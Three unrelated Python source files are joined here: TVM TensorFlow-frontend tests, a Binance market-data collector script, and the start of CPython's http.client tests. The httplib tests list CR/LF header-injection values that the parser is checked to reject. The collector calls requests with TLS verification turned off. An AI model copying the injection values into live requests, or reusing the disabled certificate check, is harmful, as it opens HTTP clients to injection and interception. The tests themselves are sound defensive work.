[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_array_feed():
with tf.Graph().as_default():
t1_data = np.array([[-1, 1, 3], [2, -2, 4], [2, -3, 14]], dtype=np.int32)
t2_data = np.array([[-2, 1, 2], [12, -2, 14], [12, -3, 4]], dtype=np.int32)
t1 = tf.placeholder(tf.int32, name="t1")
t2 = tf.placeholder(tf.int32, name="t2")
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_basic():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_nested():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), name="t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, name="t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def myfunc(x, y):
return tf.add(x, y, "myfunc")
@tf.function
def myfunc2(x, y):
z = myfunc(x, y)
l = myfunc(z, y)
m = myfunc(l, z)
return tf.add(l, m, "myfunc2")
res1 = myfunc(t1, t2)
res2 = myfunc2(res1, t1)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [res2.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_no_autograph():
with tf.Graph().as_default():
@tf.function(autograph=False)
def fun1(a):
return tf.multiply(a, a)
@tf.function(autograph=False)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_defun():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)],
Tout=[dtypes.float32],
f=fun3,
name="SpopFnInvocation",
)
compare_tf_with_tvm([], [], "SpopFnInvocation:0", mode="vm", init_global_variables=True)
def _test_spop_arithmetic():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 3)
def arithmetic(m, x, c):
z = tf.add(tf.multiply(m, x), c)
return z
m = tf.constant(10)
x = tf.constant(20)
c = tf.constant(2)
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[m, x, c], Tout=[tf.int32], f=arithmetic
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_control_flow():
with tf.Graph().as_default():
@function.Defun(*[dtypes.float32] * 2)
def Body1(x, y):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:0"):
z = math_ops.multiply(x, y)
i = 0
while i < 10:
i += 1
if i == 5:
continue
z = math_ops.multiply(x, y * i)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[constant_op.constant(32.0), constant_op.constant(100.0)],
Tout=[dtypes.float32],
f=Body1,
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_variables():
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32)
var2 = tf.Variable(const2, dtype=tf.int32)
@function.Defun(tf.int32, tf.int32)
def Forward(x, y):
return tf.multiply(x, y)
z = gen_functional_ops.StatefulPartitionedCall(
args=[var1, var2], Tout=[tf.int32], f=Forward
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", init_global_variables=True, mode="vm"
)
def _test_spop_constants():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 2)
def constantsFn(x, y):
vv = tf.constant([2, 3, 4], name="vv")
z = tf.add(vv + x, y)
return z
a = tf.constant(20000, name="a")
b = tf.constant(40000, name="b")
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[a, b], Tout=[tf.int32], f=constantsFn
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_stateful():
    # This test case checks that TVM rejects any TF stateful operations
    # (including Resource Variables) except StatefulPartitionedCall/PartitionedCall
    # (as these two operators can still be used as container graphs to execute
    # "stateless" operations internally).
tf.reset_default_graph()
with tf.Graph().as_default():
@tf.function
def FunctionWithStatefulOp_One(i):
b = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
y = tf.multiply(b, i)
return y
@tf.function
def FunctionWithStatefulOp(m, n):
a = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
x = tf.multiply(a, m)
y = FunctionWithStatefulOp_One(n)
z = tf.multiply(x, y)
return z
op = FunctionWithStatefulOp(constant_op.constant(1.0), constant_op.constant(2.0))
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm([], [], [op.name], init_global_variables=True, mode="vm")
assert execinfo.value.args[0].startswith("The following operators are not implemented")
def _test_spop_device_assignment():
# This test case is to test that TVM rejects inconsistent device assignment
# while using StatefulPartitionedCall/PartitionedCall operators which in case of TVM will
# be used as container graphs to internally execute "stateless" operations.
tf.reset_default_graph()
with tf.Graph().as_default():
def fun1(a):
with ops.device("/GPU:0"):
return tf.multiply(a, a)
def fun2(b):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:1"):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
with ops.device("/CPU:0"):
x = fun2(x)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:2"):
y = fun1(y)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:3"):
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)], Tout=[dtypes.float32], f=fun3
)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Found inconsistent Device assignment")
def _test_spop_resource_variables():
# This test case is to test that TVM rejects any graph containing
# resource variables with StatefulPartitionedOp.
tf.reset_default_graph()
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32, use_resource=True)
var2 = tf.Variable(const2, dtype=tf.int32, use_resource=True)
@tf.function
def resourceVariablesTest(x, y):
return tf.multiply(x, y)
op = resourceVariablesTest(var1, var2)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Graph is not frozen." " Provide a frozen graph")
def test_forward_spop():
_test_spop_stateful()
_test_spop_device_assignment()
_test_spop_resource_variables()
# Placeholder test cases
_test_spop_placeholder_without_shape_info()
_test_spop_placeholder_with_shape_and_default_value()
_test_spop_placeholder_numpy_arange_feed()
_test_spop_placeholder_numpy_array_feed()
# Function Invocation test cases
_test_spop_function_invocation_basic()
_test_spop_function_invocation_nested()
_test_spop_function_invocation_no_autograph()
_test_spop_function_invocation_defun()
# Test cases for various other TF constructs
_test_spop_arithmetic()
_test_spop_control_flow()
_test_spop_variables()
_test_spop_constants()
#######################################################################
# Dynamic input shape
# -------------------
def test_forward_dynamic_input_shape():
tf.reset_default_graph()
with tf.Graph().as_default():
data = tf.placeholder(tf.float32, name="data", shape=(None,))
out = data + 1
np_data = np.random.uniform(size=(2,)).astype("float32")
out_name = "add"
with tf.Session() as sess:
graph_def = tf_testing.AddShapesToGraphDef(sess, out_name)
tf_output = run_tf_graph(sess, np_data, "data:0", ["{}:0".format(out_name)])
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
np_data,
["data"],
1,
target=device,
layout="NCHW",
out_names=[out_name],
mode="vm",
ignore_in_shape=True,
)
tvm.testing.assert_allclose(tvm_output[0], tf_output[0], rtol=1e-5, atol=1e-5)
def test_forward_dynmaic_rnn_lstmblockcell():
if package_version.parse(tf.VERSION) >= package_version.parse("2.0.0"):
return
total_series_length = 50000
truncated_backprop_length = 15
state_size = 4
echo_step = 3
batch_size = 5
num_layers = 5
def generateData():
x = np.array(np.random.choice(2, total_series_length, p=[0.5, 0.5]))
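        # The target y is x delayed by echo_step samples (a simple echo task);
        # the first echo_step targets are zeroed below since they have no history.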
y = np.roll(x, echo_step)
y[0:echo_step] = 0
x = x.reshape((batch_size, -1)) # The first index changing slowest, subseries as rows
y = y.reshape((batch_size, -1))
return (x, y)
batchX_placeholder = tf.placeholder(tf.float32, [batch_size, truncated_backprop_length])
init_state = tf.placeholder(tf.float32, [num_layers, 2, batch_size, state_size])
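    # Rebuild the per-layer (c, h) LSTMStateTuple structure that MultiRNNCell expects
    # from the flat [num_layers, 2, batch_size, state_size] init_state placeholder.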
state_per_layer_list = tf.unstack(init_state, axis=0)
rnn_tuple_state = tuple(
[
tf.nn.rnn_cell.LSTMStateTuple(
state_per_layer_list[idx][0], state_per_layer_list[idx][1]
)
for idx in range(num_layers)
]
)
# Forward passes
def lstm_cell():
return tensorflow.contrib.rnn.LSTMBlockCell(state_size)
cell = tf.nn.rnn_cell.MultiRNNCell(
[lstm_cell() for _ in range(num_layers)], state_is_tuple=True
)
states_series, current_state = tf.nn.dynamic_rnn(
cell, tf.expand_dims(batchX_placeholder, -1), initial_state=rnn_tuple_state
)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
x, y = generateData()
_current_state = np.zeros((num_layers, 2, batch_size, state_size))
start_idx = 0
end_idx = start_idx + truncated_backprop_length
batchX = x[:, start_idx:end_idx]
# Save current state for TVM
current_state_tvm = _current_state
_current_state, _states_series = sess.run(
[current_state, states_series],
feed_dict={batchX_placeholder: batchX, init_state: _current_state},
)
# Organize results and corresponding names
tf_output = [_states_series]
for c in _current_state:
tf_output.append(c.c)
tf_output.append(c.h)
name = [states_series.name.split(":")[0]]
for t in current_state:
name.append(t.c.name.split(":")[0])
name.append(t.h.name.split(":")[0])
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(sess, graph_def, name)
tvm_output = run_tvm_graph(
final_graph_def,
[batchX.astype("float32"), current_state_tvm.astype("float32")],
["Placeholder", "Placeholder_1"],
out_names=name,
num_output=len(name),
mode="vm",
disabled_pass=["FoldScaleAxis"],
)
# Compare result
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Unique
# ------------
def _test_unique(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique(in_data)
if is_dyn:
compare_tf_with_tvm(np_data, "in_data:0", ["Unique:0", "Unique:1"], mode="vm")
else:
compare_tf_with_tvm(None, "", ["Unique:0", "Unique:1"])
def test_forward_unique():
"""test Unique"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique(50, dtype, is_dyn)
_test_unique(100, dtype, is_dyn)
#######################################################################
# Unique with counts
# ------------
def _test_unique_with_counts(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique_with_counts(in_data)
if is_dyn:
compare_tf_with_tvm(
np_data,
"in_data:0",
["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"],
mode="vm",
)
else:
compare_tf_with_tvm(
None, "", ["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"]
)
def test_forward_unique_with_counts():
"""test UniqueWithCounts"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique_with_counts(10, dtype, is_dyn)
_test_unique_with_counts(20, dtype, is_dyn)
#######################################################################
# check graph ir for nn.moments
# ------------
def test_moments():
g = tf.Graph()
shape = [4, 176, 8, 8]
dtype = "float32"
with g.as_default():
A = tf.placeholder(shape=shape, dtype=dtype, name="A")
B = tf.placeholder(shape=shape, dtype=dtype, name="B")
mean, variance = tf.nn.moments(A, [1], keep_dims=True)
normalised_input = (A - mean) / tf.sqrt(variance + 0.0005)
mod, _ = from_tensorflow(g.as_graph_def(add_shapes=True))
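    # Golden Relay IR expected for the moments-based normalisation above; the structural
    # check below uses map_free_vars=True, so only the graph shape has to match, not names.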
program = """
def @main(%A: Tensor[(4, 176, 8, 8), float32]) {
%527 = mean(%A, axis=[1], keepdims=True) /* moments/mean */;
%528 = subtract(%A, %527) /* sub */;
%529 = subtract(%A, %527);
%530 = multiply(%529, %529) /* moments/SquaredDifference */;
%531 = mean(%530, axis=[1], keepdims=True) /* moments/variance */;
%532 = add(%531, 0.0005f) /* add */;
%533 = sqrt(%532) /* Sqrt */;
divide(%528, %533) /* truediv */
}
"""
mod_golden = tvm.parser.parse('#[version = "0.0.5"]\n' + program)
tvm.ir.assert_structural_equal(mod["main"].body, mod_golden["main"].body, map_free_vars=True)
if __name__ == "__main__":
pytest.main([__file__])
|
proc.py
|
#!/usr/bin/python3 -W ignore
import os, requests, json, time, datetime, multiprocessing, subprocess
from pprint import pprint
#create date wise directories inside json and data directories to hold json dump and minute wise data
dirname = datetime.datetime.now().strftime("%d%B") #ex: 27October
#create directory if it doesn't exist
if not os.path.exists('json/'+dirname): os.mkdir('json/'+dirname)
if not os.path.exists('data/'+dirname): os.mkdir('data/'+dirname)
fname = datetime.datetime.now().strftime("%d%B")+'.csv'
logfile = 'logs/log_'+fname
if os.path.exists(logfile): os.remove(logfile)
def get_hist_data(market):
#fetch 1m tick data for past 1000 minutes
url = 'https://api.binance.com/api/v1/klines?symbol='+market+'&interval=1m&limit=1000'
output = requests.get(url,verify=False).json()
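    # Each kline row is [open_time, open, high, low, close, volume, close_time, ...]
    # (field order assumed from the public /api/v1/klines endpoint); keep the five
    # OHLCV fields keyed by open_time.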
return {x[0]: x[1:6] for x in output}
def get_data(market,duration=None):
#duration is in minutes
data = get_hist_data(market)
# data = {}
#if duration is not set this part will be skipped and only historic data will be taken
    if duration:
        # Path for per-minute raw rows (assumed layout; the original script referenced
        # `rawdata` without defining it, so this filename is a best guess).
        rawdata = 'data/'+dirname+'/'+market+'.csv'
        t_end = time.time() + 60 * duration
while time.time() < t_end:
url = 'https://api.binance.com/api/v1/klines?symbol='+market+'&interval=1m&limit=5'
resp = requests.get(url)
if resp.status_code != 200:
print(market,resp.status_code)
else:
                output = resp.json()[0][:6]  # reuse the response fetched above instead of making a second request
key = output[0]
data[output[0]] = output[1:]
dt = datetime.datetime.fromtimestamp(int(key)/1000).strftime("%Y-%m-%d %H:%M:%S")
                open(rawdata,'a').write("{},{},{},{}".format(market,key,dt,','.join(output[1:]))+'\n')
#wait for 30 sec before querying the API again
time.sleep(30)
#dump data dictionary to file. overwrite file if exists. one file per market per date
fname = datetime.datetime.now().strftime("{}_%d%B".format(market))+'.json'
open('json/'+dirname+'/'+fname,'w').write(json.dumps(data))
    #check for missing timestamps in data
tstamps = [int(x) for x in list(data.keys())]
values = list(data.values())
start = tstamps[0]
end = tstamps[-1]
start_dt = datetime.datetime.fromtimestamp(int(start)/1000).strftime("%Y-%m-%d %H:%M:%S")
end_dt = datetime.datetime.fromtimestamp(int(end)/1000).strftime("%Y-%m-%d %H:%M:%S")
exp = int((end - start)/60000) + 1
cap = len(tstamps)
#finds the difference of range function and tstamps list
missing_tstamps = list(set(range(start,end+60000,60000)).difference(tstamps))
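    # Log line: market, first/last candle time, expected vs. captured minute counts,
    # and how many minute timestamps are missing from the series.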
msg = "{},{},{},{},{},{}".format(market,start_dt,end_dt,exp,cap,len(missing_tstamps))
#write to log file. one log file per date, for all markets.
open(logfile,'a').write(msg+'\n')
# get_data('BTCUSDT')
# symbols = open(os.environ['HOME']+'/mudrex/symbols').read().splitlines()
jobs = []
markets = requests.get('https://api.binance.com/api/v1/exchangeInfo').json()['symbols']
total_markets = len(markets)
f = open('reports/report_'+dirname,'w')
f.write("Process start time (IST): {}.\n".format(datetime.datetime.now().strftime("%Y-%b-%d %H:%M:%S")))
f.write("Data collected for past 1000 minutes from now\n\n")
f.write("Total no. of markets: {}\n".format(total_markets))
markets_trading, markets_break = [],[]
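# Spawn one collector process per market that is actively TRADING; the 0.1 s stagger
# between process starts spreads out the initial burst of API requests.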
for market in markets:
symbol = market['symbol']
if market['status'] == "TRADING":
markets_trading.append(symbol)
p = multiprocessing.Process(target=get_data,args=(symbol,))
jobs.append(p)
time.sleep(0.1)
p.start()
else:
markets_break.append(symbol)
f.write("Total no. of markets with status as BREAK: {}\n".format(len(markets_break)))
f.write("Total no. of markets with status as TRADING: {}\n".format(len(markets_trading)))
|
test_httplib.py
|
import errno
from http import client
import io
import itertools
import os
import array
import re
import socket
import threading
import warnings
import unittest
TestCase = unittest.TestCase
from test import support
from test.support import socket_helper
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
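# Chunk sizes in chunked_start are hex byte counts: 0xa == len('hello worl'),
# 0x3 == len('d! '), 0x8 == len('and now '), 0x22 == 34 == len('for something completely different').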
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
HOST = socket_helper.HOST
class FakeSocket:
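    """Minimal in-memory socket stand-in: data written via sendall() accumulates in
    self.data, while makefile() serves the canned response text back to the reader."""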
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
self.file.close = self.file_close #nerf close ()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
def test_headers_debuglevel(self):
body = (
b'HTTP/1.1 200 OK\r\n'
b'First: val\r\n'
b'Second: val1\r\n'
b'Second: val2\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock, debuglevel=1)
with support.captured_stdout() as output:
resp.begin()
lines = output.getvalue().splitlines()
self.assertEqual(lines[0], "reply: 'HTTP/1.1 200 OK\\r\\n'")
self.assertEqual(lines[1], "header: First: val")
self.assertEqual(lines[2], "header: Second: val1")
self.assertEqual(lines[3], "header: Second: val2")
class TransferEncodingTest(TestCase):
expected_body = b"It's just a flesh wound"
def test_endheaders_chunked(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.putrequest('POST', '/')
conn.endheaders(self._make_body(), encode_chunked=True)
_, _, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
def test_explicit_headers(self):
# explicit chunked
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
# this shouldn't actually be automatically chunk-encoded because the
# calling code has explicitly stated that it's taking care of it
conn.request(
'POST', '/', self._make_body(), {'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# explicit chunked, string body
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self.expected_body.decode('latin-1'),
{'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
